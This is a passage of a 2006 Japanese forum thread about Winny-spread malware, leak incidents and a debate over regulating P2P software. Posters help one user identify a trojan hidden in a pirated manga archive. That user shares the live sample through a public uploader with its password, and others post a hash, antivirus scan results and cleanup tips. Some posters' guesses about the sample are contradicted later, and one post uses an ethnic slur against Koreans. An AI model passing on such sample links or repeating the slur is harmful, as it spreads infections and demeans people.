あと「乳 -jpg -コミック -貧 -洋」
とか。乳に興味あっても貧乳には興味なしすか。

115 :[名無し]さん(bin+cue).rar:2006/03/27(月) 23:16:55 ID:o28BHgeD0
\(^o^)/トレンドマイクロオワタ

116 :[名無し]さん(bin+cue).rar:2006/03/27(月) 23:22:05 ID:1mgV8t3g0
>>114
何かトレンド的に笑えるネタはない?
いや、これ以上笑かせてもらっても困るんだけどさ。(w

117 :[名無し]さん(bin+cue).rar:2006/03/27(月) 23:35:51 ID:Mx2483uL0
>>116
野田さん宿題.txt
野田さん(´・ω・) カワイソス

基本的に営業資料なんでほとんどが
2003年にトレンドはこういうプレゼンで営業していた、というような内容でした。

118 :[名無し]さん(bin+cue).rar:2006/03/27(月) 23:41:56 ID:Faja0Vdn0
>>104
ミューテックスをつくるときはCreateMutexを呼ぶから、
逆アセンブルでもして、CreateMutexの3番目の引数が何なのか
みてればわかります。

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dllproc/base/createmutex.asp

119 :[名無し]さん(bin+cue).rar:2006/03/27(月) 23:42:33 ID:s/Bti0SE0
アニヲタなだけじゃまいか

120 :[名無し]さん(bin+cue).rar:2006/03/27(月) 23:52:23 ID:kZrHrVv30
俺もそう思う

121 :[名無し]さん(bin+cue).rar:2006/03/28(火) 00:46:25 ID:kvYl8mLP0
拡張子偽装って
ファイル名.mpg                          .exe
とかの事じゃなかったんだな

122 :[名無し]さん(bin+cue).rar:2006/03/28(火) 00:47:44 ID:nxZfKWpY0
>>118
日本語版も置いとく。
ttp://www.microsoft.com/japan/developer/library/jpwinpf/_win32_createmutex.htm

123 :[名無し]さん(bin+cue).rar:2006/03/28(火) 01:20:06 ID:uPDmmk9P0
>>104
sysinternalsのProcess ExplorerとかWInObjで見れる。
BaseNamedObjects下のMutantがミューテックス。

124 :[名無し]さん(bin+cue).rar:2006/03/28(火) 02:16:36 ID:L3gMVnxJ0
なんかまた爆撃ウィルスっぽいのがでた?

125 : ◆HhTh8Gv36s :2006/03/28(火) 03:12:05 ID:+9IOW4AS0
 

126 :[名無し]さん(bin+cue).rar:2006/03/28(火) 14:52:59 ID:AZvEy0oN0
هغلبف خ فقث ة

127 :[名無し]さん(bin+cue).rar:2006/03/28(火) 15:51:13 ID:VpIt+gkr0
18禁 ゲーム -CG
アニメ -18 -ガンダム -プラネテス -R.O.D -ロードス -鋼 -part
アプリ
乳 -jpg -コミック -貧 -洋


アプリ(´・ω・`)?

128 :[名無し]さん(bin+cue).rar:2006/03/28(火) 17:15:37 ID:RJYNo6s+0
>>127
割れざーってことでは?

129 :[名無し]さん(bin+cue).rar:2006/03/28(火) 17:18:03 ID:Agy3Oab1O
>>122
>>123
超サンクスです
どちらの方法でもばっちりでした

130 :[名無し]さん(bin+cue).rar:2006/03/28(火) 22:06:34 ID:PQSHXQYT0
ttp://motivate.jp/archives/2006/03/winny_3.html
「短絡的にWinnyを規制するのはおかしい」という短絡的な発想

131 :[名無し]さん(bin+cue).rar:2006/03/28(火) 22:24:43 ID:0WNmxvOS0
そのバカはどうでもいいよ・・・

偽装ファイルによるWinny漏洩情報の隠蔽
ttp://motivate.jp/archives/2006/03/winny_4.html

132 :[名無し]さん(bin+cue).rar:2006/03/28(火) 23:07:01 ID:aD8Kss+X0
>>131
鑑定人の人より先に1次流出見つけられれば
ウンザリもまんざらじゃないんだろうけどね。

それ以外は華麗なる敗退の歴史が。

133 :[名無し]さん(bin+cue).rar:2006/03/29(水) 00:32:16 ID:XBjA/vfN0
>>130-131
近代稀に見るバカだよなあ・・・
そもそもウィルスは「感染した奴が悪い」のは自明の理なのに、
Winnyが悪いWinnyが悪いって・・・アホちゃうかと

コメントも読んできたけどWinnyがセキュリティホールを抱えてるんだってね。
この論理でいくと「山田ウィルス」はWindowsがセキュリティホールを抱えてることになるし。

134 :[名無し]さん(bin+cue).rar:2006/03/29(水) 00:39:12 ID:fr0KSpwE0
>>Windowsがセキュリティホールを抱えてることになるし。

え、ちがうの?

135 :[名無し]さん(bin+cue).rar:2006/03/29(水) 00:58:53 ID:kBjdsbIj0
>>134
ちがわない。 穴だらけだしw

136 :[名無し]さん(bin+cue).rar:2006/03/29(水) 01:05:48 ID:XBjA/vfN0
>>134-135
いや、そうなんだけど、これで山田ウィルスが蔓延したら
「Winny使うな」じゃなくて「Windows使うな」にならない?

137 :[名無し]さん(bin+cue).rar:2006/03/29(水) 01:07:21 ID:q81bjjHq0
こいつ、結局何がしたいのかね
偽装ファイル流して企業から金取るって話か?

何処かで聞いた、なw

138 :[名無し]さん(bin+cue).rar:2006/03/29(水) 01:09:36 ID:W+4fz0is0
>>130->>131
何そのバカ('A`)
こんなんでも教授かw

所詮セキュリティっていってもこんなもんか。

139 :[名無し]さん(bin+cue).rar:2006/03/29(水) 01:17:32 ID:1PMBkaja0
つ[ハッシュリスト]

140 :[名無し]さん(bin+cue).rar:2006/03/29(水) 01:26:05 ID:W+4fz0is0
セキュリティ界の人は誰も>>130の人に逆らえないのかなあ。
だとしたら本当に大したことない。

141 :[名無し]さん(bin+cue).rar:2006/03/29(水) 02:27:54 ID:UtE4PGwl0
メール開くのも怪しいttp開くのも
自己責任じゃなかったのか!
おらびっくらこいた

142 :[名無し]さん(bin+cue).rar:2006/03/29(水) 02:32:01 ID:UtE4PGwl0
と思ったら俺の話ずれとるね
ごめんなんよ

143 :[名無し]さん(bin+cue).rar:2006/03/29(水) 05:35:01 ID:X469NCMC0
>>140
心配なさらなくても、あんなの相手にしてませんyo。

144 :[名無し]さん(bin+cue).rar:2006/03/29(水) 07:32:10 ID:UK2fVviw0
>143
ところが、マスコミがこういうのを「セキュリティーの権威」とか言って持ち上げたりすることがあるわけだ。
そうなるとなぜか、どんなバカな発言でも妙な重みが出て、国会で取り上げられたりするわけだ。
それが元で法律ができたり、こういう人が何かの委員の一人に選ばれたりすることがあるわけだ。

アホなことを言っている時はちゃんと論拠を示して反論しないとね。

この人の言っていることは間違っちゃいないけど、「それ以前の問題」なんだよね。
基本的に感染者は、著作権法違反を犯している可能性が非常に高いわけだ。
実際に、映画をダウンロードしていたという報道もあった。要するに自業自得なわけ。
ところがどの報道を見ても、それでACCSやJASRACなどから訴えられたという話は見えてこない。
あれだけWinnyは著作権法違反者の巣窟だと言っていた団体が、だよ?
いつもは声高に声明を発表するのに、なぜこの好機に著作権保護意識の徹底を訴えない?
このあたりも非常に不自然に感じるところだけど、論点がずれてきたな。

確かにWinnyが無ければ情報は流出しなかっただろうし、被害も小さかっただろう。
だけどそれをインストールして操作したのは、感染者(もしくはその家族)であることは間違いない。
その責任を全てソフトウェアと開発者に転嫁できるはずがない。
このあたりの認識のズレが問題なわけだ。P2Pが悪くないというのはそういうこと。
仮にWinnyが無くても、同じような事件がまた起きる可能性はかなり高いはずだ。

これがメールで山田オルタに感染したとかならば、同情の余地はあるけど……。

145 :[名無し]さん(bin+cue).rar:2006/03/29(水) 08:04:09 ID:SqYRAYbc0
>>実際に、映画をダウンロードしていたという報道もあった。


違法なのはアップロード
ダウンロードは合法

146 :クマー:2006/03/29(水) 09:06:48 ID:nTm+T9FX0
>>140
あんだけみんなが130の人の短絡っぷりを指摘してるのに理解できてないんだから
馬鹿認定しただけだと思う。
治安維持法が国会通っても諸手上げてよろこぶんじゃね?
歴史で覚えてる事は大化の改新と大塩平八郎の乱だけなんだろ。
ニャーム・ニュイルスの話じゃなくてごめん。

147 :[名無し]さん(bin+cue).rar:2006/03/29(水) 09:12:20 ID:z+F1moFQ0
>>144
あなたと件の人とでは被害者の定義と位置付けが違ってますね

件の人が被害者としてるのは感染者本人だけじゃなく
感染者のせいで情報を流出された人を含んでいて
感染者以外の被害者の被害を重く見てるようですよ

148 :[名無し]さん(bin+cue).rar:2006/03/29(水) 09:32:06 ID:6L1xR0/d0
情報を流出された人に対して責任を負うのは感染者だけでいいと思うが

149 :[名無し]さん(bin+cue).rar:2006/03/29(水) 09:39:27 ID:z+F1moFQ0
責任の所在に関する議論と被害拡大の防止方法に関する議論が混同されてますね

150 :[名無し]さん(bin+cue).rar:2006/03/29(水) 09:54:13 ID:Wt2Cmlwy0
ウイルスが原因じゃなければ流出させた本人が悪いで終了。
ウイルスがwinny所以じゃなければウイルス作成者が悪いという論調になる。
ウイルスにわざと感染とか感染を装ってとかなら別だが。

151 :[名無し]さん(bin+cue).rar:2006/03/29(水) 10:38:01 ID:oHPnet6j0
>責任の所在に関する議論と被害拡大の防止方法に関する議論
混同してるのはどっちかと
今さら拡大防止を試みたところで、ほとんど無意味→責任の所在と重大性が問題になっている
今後の新たな流出への対策としても、見通しが甘すぎてお話にならない
まあ詳しく話して余計なヒントを与える気はないので、好きにすればいいと思う

152 :[名無し]さん(bin+cue).rar:2006/03/29(水) 10:43:19 ID:OaA1iugG0
>>130が言ってるのはHIVに感染するかも知れないからSEXは禁止ってことだな

153 :[名無し]さん(bin+cue).rar:2006/03/29(水) 11:02:18 ID:xsx+PdYM0
論点ズレてても強引に自分の言いたい方向に話を持っていって
妙に上から見た言い方で物を知っているかのように語る割には
実際には中身のある内容を語らない>>151みたいなのって最近の流行?

154 :[名無し]さん(bin+cue).rar:2006/03/29(水) 11:22:47 ID:oHPnet6j0
>>153
大昔からある方法だよ
それであんたはID:z+F1moFQ0?

155 :[名無し]さん(bin+cue).rar:2006/03/29(水) 11:30:33 ID:z+F1moFQ0
>>151
> 混同してるのはどっちかと

どっちというか混同してる人が多いですよねというお話です

>>154
ID:z+F1moFQ0 と ID:xsx+PdYM0 を混同してますね

156 :[名無し]さん(bin+cue).rar:2006/03/29(水) 12:18:00 ID:6hsoHnfC0
流出させた本人(と会社)がろくすっぽ責任とらねえからな。
現状では、巻き添えになった被害者が可哀想ではある。

だからWinnyを規制しようって短絡思考を短絡思考と決め付ける短絡思考。

157 :[名無し]さん(bin+cue).rar:2006/03/29(水) 12:20:25 ID:6hsoHnfC0
なんかちがうな。まあいいや。

158 :[名無し]さん(bin+cue).rar:2006/03/29(水) 12:48:48 ID:wt1htnWw0
置き換えてあげよう

チョンが強盗殺人を起こしたとして、
チョンが悪いのではなく、チョンに強盗をそそのかした天の啓示が悪い

チョンが幼児への強姦が起こったとして、
責任の追及先がチョンではなく、チョンに啓発を与えたロリコン本だということ

チョンに刑事責任を追及するよりも簡単な事があるって事と一緒

159 :[名無し]さん(bin+cue).rar:2006/03/29(水) 13:03:49 ID:oHPnet6j0
責任の所在をはっきりさせないで責任のない者に義務を押しつける
Winny規制の方へ目を向けたがる人こそが混同してる
だから、切り分けられてる人からすれば、責任の所在は感染して流出させた人だよ
と突っ込みたくなるんだよ

安易にWinny規制方向へ目を向ける人は、結局、価値判断でしかものを見ていない
いわゆる理系脳の典型
厨房が「俺こんなこと思いついたよww俺天才wwwなんで誰もやらないの?www」
って言ってるようで痛すぎる

160 :[名無し]さん(bin+cue).rar:2006/03/29(水) 13:06:56 ID:xsx+PdYM0
春の訪れを告げる人がいますね

161 :[名無し]さん(bin+cue).rar:2006/03/29(水) 14:48:03 ID:HiHfxTB20
>>160
一年中スレに張り付いていれば季節も分かるようになりますか?

162 :[名無し]さん(bin+cue).rar:2006/03/29(水) 16:40:24 ID:6rh9oH470
そろそろ新種がほしいな

163 :[名無し]さん(bin+cue).rar:2006/03/29(水) 17:05:00 ID:5JludRL5O
最近のは携帯で見ただけでもかかるんだな

164 :[名無し]さん(bin+cue).rar:2006/03/29(水) 17:15:47 ID:vQEOBaFN0
住基ネットの関連資料が流出したのは想定の範囲内かな?

165 :[名無し]さん(bin+cue).rar:2006/03/29(水) 19:02:06 ID:X469NCMC0
最も晒されて困るのは、個人のハメ録り写真とかだろ
そーゆーもんでも流れるこのご時世に、
Nシステムとか住基ネットとか、所詮、他人ごとの情報なんだから
流れ出ないものはないだろな

166 :[名無し]さん(bin+cue).rar:2006/03/29(水) 20:57:47 ID:5JludRL5O
お前 チンパンジーか

167 :[名無し]さん(bin+cue).rar:2006/03/29(水) 21:06:52 ID:JOU+7cVU0
どっかの馬鹿の羽目取り写真が流れても
分かる奴にしか分からないからプギャーで終わりだが
機密情報は流れた奴のバックボーンとか立場とか
個人情報が赤裸々に晒されるから被害デカい

どっかのおっさんの女装写真、じゃ祭りにはならんが
某衆議院議員の女装写真、だと祭りになるだろ?

168 :[名無し]さん(bin+cue).rar:2006/03/29(水) 21:13:59 ID:X469NCMC0
被害とか損害のでかさで競うなら別の話だ
何を漏らしたくないか、ということではないのか?
どこかのオッサンだろうと、議員だろうと
流れて恥じるもの各々であるだろ。それさえ守れないのに
何を今更って感じなんだが。

169 :[名無し]さん(bin+cue).rar:2006/03/29(水) 22:43:36 ID:lb9EItMY0
Winnyを規制したとします。
ユーザーはWinnyを利用できません。
暴露ウイルスの作者ももうWinnyのネットワークは悪用できません。




なのでユーザーは違うネットワークを利用します。
暴露ウイルスの作者も違うネットワークを悪用します。

170 :[名無し]さん(bin+cue).rar:2006/03/29(水) 22:46:12 ID:lMy3B/4y0
>>169
結局そこなんだよね
臭い物にフタではそうなってしまうのが目に見えてるのに
規制すればいいとかアホすぎ

171 :[名無し]さん(bin+cue).rar:2006/03/29(水) 22:54:54 ID:vQEOBaFN0
自分にとって脅威となるものには2種類の対処しかない。
取り込むか、無くしてしまうかだ。

172 :[名無し]さん(bin+cue).rar:2006/03/29(水) 23:12:45 ID:6rh9oH470
新種マダー?
もう春休み終わっちゃうよ〜

173 :[名無し]さん(bin+cue).rar:2006/03/29(水) 23:34:29 ID:HKb6CMbv0
なんかこの板、新種の爆撃食らってないか?

174 :[名無し]さん(bin+cue).rar:2006/03/29(水) 23:38:45 ID:IKZaDoVa0
>>173
食らってるよ
局地的なんで話題にもならんが

175 :[名無し]さん(bin+cue).rar:2006/03/29(水) 23:53:27 ID:4trp1FuC0
今回の爆撃見て思ったけど他のスレ(板)の人間ってウイルスそのものには興味ないのな
ハッシュもファイル名も貼られなくいし。自分はそれが一番興味あるんだが

176 :[名無し]さん(bin+cue).rar:2006/03/29(水) 23:55:52 ID:alYZWTfW0
なくいし?

177 :[名無し]さん(bin+cue).rar:2006/03/29(水) 23:58:25 ID:z+F1moFQ0

        ∩___∩                     ∩___∩
なくいし?  | ノ ⌒  ⌒ヽハッ    __ _,, -ー ,,    ハッ   / ⌒  ⌒ 丶| なくいし?
        /  (●)  (●)  ハッ   (/   "つ`..,:  ハッ (●)  (●) 丶
       |     ( _●_) ミ    :/       :::::i:.   ミ (_●_ )    |
 ___ 彡     |∪| ミ    :i        ─::!,,    ミ、 |∪|    、彡__
 ヽ___       ヽノ、`\     ヽ.....:::::::::  ::::ij(_::●   / ヽノ     ___/
       /       /ヽ <   r "     .r ミノ~.    〉 /\   丶      
      /      /    ̄   :|::|>>175 ::::| :::i ゚。  なくいし? \    丶    
     /     /  なくいし? :|::|    ::::| :::|:            \   丶     
     (_ ⌒丶...        :` |    ::::| :::|_:           /⌒_)     
      | /ヽ }.          :.,'    ::(  :::}            } ヘ /        
        し  )).         ::i      `.-‐"             J´((
          ソ  トントン                             ソ  トントン

178 :[名無し]さん(bin+cue).rar:2006/03/30(木) 00:07:50 ID:70Z32Kr80
AAワロスw

179 :[名無し]さん(bin+cue).rar:2006/03/30(木) 00:24:03 ID:3azBrhT90

        ∩___∩                     ∩___∩
なくいし?  | ノ ⌒  ⌒ヽハッ    __ _,, -ー ,,    ハッ   / ⌒  ⌒ 丶| なくいし?
        /  (●)  (●)  ハッ   (/   "つ`..,:  ハッ (●)  (●) 丶
       |     ( _●_) ミ    :/       :::::i:.   ミ (_●_ )    |
 ___ 彡     |∪| ミ    :i        ─::!,,    ミ、 |∪|    、彡__
 ヽ___       ヽノ、`\     ヽ.....:::::::::  ::::ij(_::●   / ヽノ     ___/
       /       /ヽ <   r "     .r ミノ~.    〉 /\   丶      
      /      /    ̄   :|::|>>175 ::::| :::i ゚。  なくいし? \    丶    
     /     /  なくいし? :|::|    ::::| :::|:            \   丶     
     (_ ⌒丶...        :` |    ::::| :::|_:           /⌒_)     
      | /ヽ }.          :.,'    ::(  :::}            } ヘ /        
        し  )).         ::i      `.-‐"             J´((
          ソ  トントン                             ソ  トントン


180 :[名無し]さん(bin+cue).rar:2006/03/30(木) 01:00:03 ID:6N4yC2my0
まぁ
簡潔にまとめると
取り扱い注意な物をお馬鹿さんが簡単にさわれることが原因で

なおかつセキュリティ対策が後手後手になっていて収集がつかない
というか対策する時間がない

文明の進化の最終形態は滅亡と同意義に近い

181 :[名無し]さん(bin+cue).rar:2006/03/30(木) 01:17:36 ID:gPfN8aG00
結局、キチガイに刃物なわけだよ。
nyは、よく切れる刃物だったわけで、刀匠を捕まえても
キチガイがいる以上は、人は傷つけられると。

ケーサツとか公務員の中からキチガイを無くさないとねぇ

182 :[名無し]さん(bin+cue).rar:2006/03/30(木) 01:23:16 ID:qbSSXW140
このAAを初めて見たのは株板だった

183 :[名無し]さん(bin+cue).rar:2006/03/30(木) 01:48:07 ID:E6abkGpV0
自動車事故が起きるのは自動車メーカーのせいと言うのと同じ理屈

184 :[名無し]さん(bin+cue).rar:2006/03/30(木) 01:57:31 ID:NzYnABZM0
何いってんだ、自動車事故が起こるのは道路があるせいだろ

185 :[名無し]さん(bin+cue).rar:2006/03/30(木) 02:01:32 ID:/DfmLK810
自分ちの庭で事故るヤツも稀に居る。

186 :[名無し]さん(bin+cue).rar:2006/03/30(木) 02:04:39 ID:kNYNCvLi0
自動車事故が起こるのは小泉が靖国参拝をやめないせいだ

187 :[名無し]さん(bin+cue).rar:2006/03/30(木) 02:27:40 ID:u7luXib70
なんか中二病みたいな話になってくるなw

188 :[名無し]さん(bin+cue).rar:2006/03/30(木) 03:09:23 ID:jATs6Fur0
いや全然

189 :[名無し]さん(bin+cue).rar:2006/03/30(木) 04:21:15 ID:EU42OeFk0
>>159
原因を見誤ると結果がdでもない事になるってのは理系ならよく知ってると思われ
さらに倫理教育もそれなりにされてる訳だが

なんとなく馬鹿にされてるような気がしたので触った
反省はしていない

190 :[名無し]さん(bin+cue).rar:2006/03/30(木) 05:57:09 ID:6SGzQhVP0
テレビで報道されることで犯人はますます自己顕示欲が満足され調子に乗ってるようだが。
やり口がこうパターン化してるとキンタマや山田ウイルスや亜種を作りまくったのは自分だと言ってるようなものだ。
前から思ってたが、犯人はウイルス作る前は2ちゃんねるで荒らしやってたやつに違いない。

191 :[名無し]さん(bin+cue).rar:2006/03/30(木) 06:01:46 ID:v37YjlrH0
著作権者団体の中に犯人がいるって噂もあるけどな。
著作権侵害にむかついてばらまいているって話。

192 :[名無し]さん(bin+cue).rar:2006/03/30(木) 08:36:03 ID:KPjIxV9S0
それだったら某エロゲメーカーみたいにホワイターでもばら撒けばいいのにw。

193 :[名無し]さん(bin+cue).rar:2006/03/30(木) 09:06:23 ID:Di2UBwvE0
↓すごい破壊力だ。
【Winny】警察,公務員からの流失総合【キンタマ】
http://tmp6.2ch.net/test/read.cgi/download/1141432584/595

595 名前:[名無し]さん(bin+cue).rar[] 投稿日:2006/03/30(木) 05:07:28 ID:WsN9Q22K0
■■ウイルス空襲警報■■
現在、ここに攻撃が来ています。

条件は
・「Winny」を含み、dat番号が一番古いもの
・「Share」を含み、dat番号が一番古いもの
・4桁の数字を含み、dat番号が一番古いもの

を並行して攻撃していると考えられます。
このスレは、「Winny」を含むこの板で最も古いスレ(1000オーバー除く)です。


194 :[名無し]さん(bin+cue).rar:2006/03/30(木) 10:10:37 ID:lkiOhOIi0
BIOS破壊するウイルス作る人いないのかな?

195 :[名無し]さん(bin+cue).rar:2006/03/30(木) 10:40:02 ID:gPfN8aG00
>>194
大昔からあるよ。

196 :[名無し]さん(bin+cue).rar:2006/03/30(木) 11:06:40 ID:GW5KTTEn0
今はライトユーザーが多いからHDDやBIOSを破壊するより
情報を流出させた方がウイルスの破壊力としては高いのよね

197 :[名無し]さん(bin+cue).rar:2006/03/30(木) 11:21:31 ID:hvOHzHql0
パソコンの環境を破壊するんじゃなくて、個人の生活環境を破壊する
活動だからな。

198 :[名無し]さん(bin+cue).rar:2006/03/30(木) 12:08:11 ID:NzYnABZM0
> 安易にWinny規制方向へ目を向ける人は、結局、価値判断でしかものを見ていない
> いわゆる理系脳の典型
どちらかといえば「頭の悪い女と同じ」とかだよな

漏れはフェミニストだけど(;´Д`)

199 :[名無し]さん(bin+cue).rar:2006/03/30(木) 12:09:35 ID:WfNezqnn0
漏れはサユリストだけど(;´Д`)

200 :[名無し]さん(bin+cue).rar:2006/03/30(木) 12:26:07 ID:FZA0RHVo0
ウィニー:ニフティも抑止 最大手、影響必至−話題:MSN毎日インタラクティブ
ttp://www.mainichi-msn.co.jp/shakai/wadai/news/20060330k0000m040153000c.html

ぷららもだけどWinny規制って契約違反とかにならんの?

201 :[名無し]さん(bin+cue).rar:2006/03/30(木) 12:39:56 ID:KKz/oT0Y0
>>200
 ニフティによると、昨年からつなぎっ放しで回線を占有し続けるなど、ファイル交換ソフト利用者の悪用が
目立つようになったのが主な理由。回線の制限は昨年12月から首都圏で先行して始め、ウィニーだけでなく、
他のファイル交換ソフトも対象にしているという。
 今秋までに、これらのファイル交換ソフトを使うとデータが流れにくくなるよう、接続速度(帯域)を8〜9割
カットする機器を設置する計画。



情報流出騒動に便乗した暴挙だな

202 :[名無し]さん(bin+cue).rar:2006/03/30(木) 12:46:57 ID:KKz/oT0Y0
ブロードバンドというものの存在意義を否定する行為を
プロバイダが行い、それを黙認するメディア。


203 :[名無し]さん(bin+cue).rar:2006/03/30(木) 12:59:19 ID:5w9zOsOC0
>>201
汚いよな。なんでカットされねばならないのか理由が欲しい。
それじゃあ従量制と変わらんじゃないか。
Winny=悪、危険というイメージ操作が現在ピークだからやったとう感じだ。

204 :[名無し]さん(bin+cue).rar:2006/03/30(木) 13:07:32 ID:GW5KTTEn0
P2P利用者追い出してもISPは別に困らないからな

205 :[名無し]さん(bin+cue).rar:2006/03/30(木) 13:22:01 ID:dDmbgo8l0
>>204
ユーザが減ったら困るんじゃね?

206 :[名無し]さん(bin+cue).rar:2006/03/30(木) 13:38:01 ID:erXfKSfe0
ISPは規制することで自分の首を絞めることになるとは気づいてないのかね。
P2P利用者は増えるばかりで減ることはないのだから、規制なしにすれば当分安泰だというのに。

207 :[名無し]さん(bin+cue).rar:2006/03/30(木) 13:38:40 ID:/onie6Qf0
(一般コミック・雑誌) [ジャンプ] [2006-18] DEATH NOTE Page.103 「宣言」.zip 6,977,397 

をWinrarで中身を見ようとして誤って中のexeファイルをダブルクリックしてしまいました。
ノートン2005は反応せず、スキャンしてもウイルスは出ませんでした。
山田やキンタマスレも見ましたが違うみたいです。
どなたか情報お願いします。

208 :[名無し]さん(bin+cue).rar:2006/03/30(木) 13:39:49 ID:FKOP5v9P0
これをきっかけにほとんどのプロパイダで同様の規制が始まると読んでるんだろ
あと一部のP2P使用者がやめてもそれで回線が空けば
そっちのメリットの方がデカいと考えてるんだろ

P2P利用者はまだまだ少数派なんだし。

209 :[名無し]さん(bin+cue).rar:2006/03/30(木) 13:41:30 ID:FKOP5v9P0
>>207
お前みたいな違法にWinny使う奴のせいで規制される結果になった
自業自得。自己責任
自分の尻は自分で拭きましょう

210 :[名無し]さん(bin+cue).rar:2006/03/30(木) 13:43:24 ID:GW5KTTEn0
>>206
こういう考えに既に自分の願望が多分に含まれている事に気づかないのかな

211 :[名無し]さん(bin+cue).rar:2006/03/30(木) 13:48:22 ID:KKz/oT0Y0
>>207
とりあえずレジストリのRUNエントリとスタートアップフォルダを調べてみて
怪しい値やショートカットがないか調べる
怪しいものを発見したらそれをgoogle等で調べてみる
調べてみてそれがウィルスとかだったら削除

それと平行してタスクマネージャーを立ち上げて怪しいプロセスが無いか調べる
sys.exeやupdate.exeがあったら要注意だしsvchost.exeでsystem32以外の物も非常に怪しい


212 :[名無し]さん(bin+cue).rar:2006/03/30(木) 13:51:50 ID:cYg+oGWo0
ジブリアイコラゲームロリータ07個人情報詰め合わせサントラまんこanime素人.MAME処女膜06銭湯声優フェラHCG.exe

213 :[名無し]さん(bin+cue).rar:2006/03/30(木) 13:52:52 ID:FZA0RHVo0
>>207
.exeだけパス掛けてうpしてくれ

214 :[名無し]さん(bin+cue).rar:2006/03/30(木) 14:00:51 ID:/onie6Qf0
>>209
すいません、その通りです。駄目だったら諦めてクリーンインストールします。

>>211
ありがとうございます。スタートアップには怪しいものはありませんでした。
レジストリチェックしてみます。

>>213
ttp://whiteband.sakura.ne.jp/uploader/upload.html

のup1545.rarにアップしました。Passはsageです。お願いします。

215 :[名無し]さん(bin+cue).rar:2006/03/30(木) 14:02:00 ID:sTm3Hj700
いま同人板を爆撃中の奴
Search.txtかDownload.txtの中身を書き込んでるっぽいな

216 :[名無し]さん(bin+cue).rar:2006/03/30(木) 14:05:28 ID:7+kLJWeB0
>>214
一応VirusTotalの結果を張っとくね(意外にもAVGが頑張ってる)

This is a report processed by VirusTotal on 03/30/2006 at 07:05:06 (CET) after scanning the file "up1545.rar" file.

AntivirusVersionUpdateResult
AntiVir6.34.0.1403.29.2006no virus found
Avast4.6.695.003.29.2006no virus found
AVG38603.29.2006PSW.Generic.AGB
Avira6.34.0.5403.29.2006no virus found
BitDefender7.203.30.2006no virus found
CAT-QuickHeal8.0003.29.2006no virus found
ClamAVdevel-2006020203.29.2006no virus found
DrWeb4.3303.29.2006Trojan.PWS.Ruby
eTrust-InoculateIT23.71.11503.30.2006no virus found
eTrust-Vet12.4.214103.29.2006no virus found
Ewido3.503.29.2006no virus found
Fortinet2.71.0.003.30.2006suspicious
F-Prot3.16c03.28.2006no virus found
Ikarus0.2.59.003.29.2006no virus found
Kaspersky4.0.2.2403.30.2006no virus found
McAfee472903.29.2006no virus found
NOD32v21.146103.29.2006no virus found
Norman5.70.1003.29.2006no virus found
Panda9.0.0.403.29.2006no virus found
Sophos4.04.003.30.2006no virus found
Symantec8.003.30.2006no virus found
TheHacker5.9.7.12203.30.2006no virus found
UNA1.8303.23.2006Trojan.Spy.Win32.Kakkeys
VBA323.10.503.29.2006Trojan.PWS.Ruby


217 :[名無し]さん(bin+cue).rar:2006/03/30(木) 14:14:39 ID:dDmbgo8l0
>>214
UPX圧縮がかかってるみたいだから、バイナリエディタで開いただけ
じゃわからんかった。他のひと助言ぷりーず。

218 :[名無し]さん(bin+cue).rar:2006/03/30(木) 14:20:59 ID:c7MwuXoW0
>>214
ご丁寧にもUPX圧縮されてるね。
あまり詳しくないのでなんともいえないけど・・・。
爆撃型のウィルスではないっぽい。
Portとか8080の文字列があるところからみたら山田系かも。
これ以上はわからんです。間違ってたらスマソ。
もっと詳しい人、よろです。

219 :[名無し]さん(bin+cue).rar:2006/03/30(木) 14:36:09 ID:WfNezqnn0
UPXならすぐ解凍できるね

220 :[名無し]さん(bin+cue).rar:2006/03/30(木) 15:02:05 ID:c7MwuXoW0
>>218補足
Delphi製かな?Delphi詳しくないんでわからんけど。
何故か、foobarなる文字列がやけに多い。
HKEY_CURRENT_USER\Software\foo
HKEY_CURRENT_USER\Software\foo\bar
なるレジストリを生成?ちょっと微妙です。^^;
>>214
一応レジストリで上の2つがあったら消したほうが良いかも。

解析にもなってないですが、何かの参考になれば・・・。
間違ってたら痛いな。orz

221 :[名無し]さん(bin+cue).rar:2006/03/30(木) 15:03:21 ID:5w9zOsOC0
>>207
毎回思うんだけど中身確認する必要なくない?
そのまま漫画ミーヤに突っ込めば画像は見れるしEXE排除のツールもあるし・・・。

222 :207:2006/03/30(木) 15:14:43 ID:/onie6Qf0
みなさんありがとうございます。色々回ってみた結果山田オルタだったみたいです。
コマンドプロンプトnetstatでLocal Address8080確認しました。
よく確認しないで山田ではないと決め付けてしまい、皆さんにご迷惑おかけしました。
駆除サイトが落ちてしまっているようなのでクリーンインストールしようと思います。
ありがとうございました。危険なのでアップしたものも削除します。


223 :[名無し]さん(bin+cue).rar:2006/03/30(木) 15:54:13 ID:7uxWww0p0
ああん。落とし損ねた。

山田だとしたら新種かな?

224 :[名無し]さん(bin+cue).rar:2006/03/30(木) 16:13:03 ID:fcLSu0IC0
>>222
なんでそういう結論になったんだ?
これは山田でもオルタでもない。単なる掲示板爆撃型。

225 :[名無し]さん(bin+cue).rar:2006/03/30(木) 17:40:43 ID:fgNEwqE50
ttp://internet.watch.impress.co.jp/cda/news/2006/03/30/11447.html
KDDIの社員情報186人分などがWinnyネットワーク上に流出

226 :[名無し]さん(bin+cue).rar:2006/03/30(木) 17:54:17 ID:cBGwntSo0
いいかげん、みんなで晒せば怖くない報道あきた

227 :[名無し]さん(bin+cue).rar:2006/03/30(木) 18:05:34 ID:bok3OQtR0
>>218,220
ruby+Exerb製だよ。

>>222
8080番ポートを使ってるからといって山田とは断定できんよ。
sys.exeやupdate.exeみたいな怪しげなプロセスがそれらのポートで通信していることで初めて山田の疑いがある。

228 :207:2006/03/30(木) 18:10:34 ID:/onie6Qf0
>>224 >>227
8080portが使われてたので山田かと思いました。
確かにsys.exeもupdate.exeもありませんでした


229 :[名無し]さん(bin+cue).rar:2006/03/30(木) 18:44:55 ID:wlDy2eHG0
>>214
(一般コミック・雑誌) [ジャンプ] [2006-17] DEATH NOTE 102 我慢.zip
817dac31436ec7b1f381b7ffba69b502

ウイルスバスター2006で検知
TROJ_KAKKEYS.P

上記の亜種の模様。バイナリでみたらくりそつでした。

尚現在、ウイルスバスター2006反応無しです。

230 :[名無し]さん(bin+cue).rar:2006/03/30(木) 20:13:21 ID:6SGzQhVP0
ほら見ろ、マスコミが騒ぐからウイルス作者が狂ったように亜種作ってばら撒いてやがる。
奴はこの辺のヲチスレとかもくまなく巡回してほくそ笑んでるだろう。元が生粋のねらーだろうから。
俺はbanananあたりじゃないかと睨んでるんだが。

231 :[名無し]さん(bin+cue).rar:2006/03/30(木) 20:18:31 ID:GW5KTTEn0
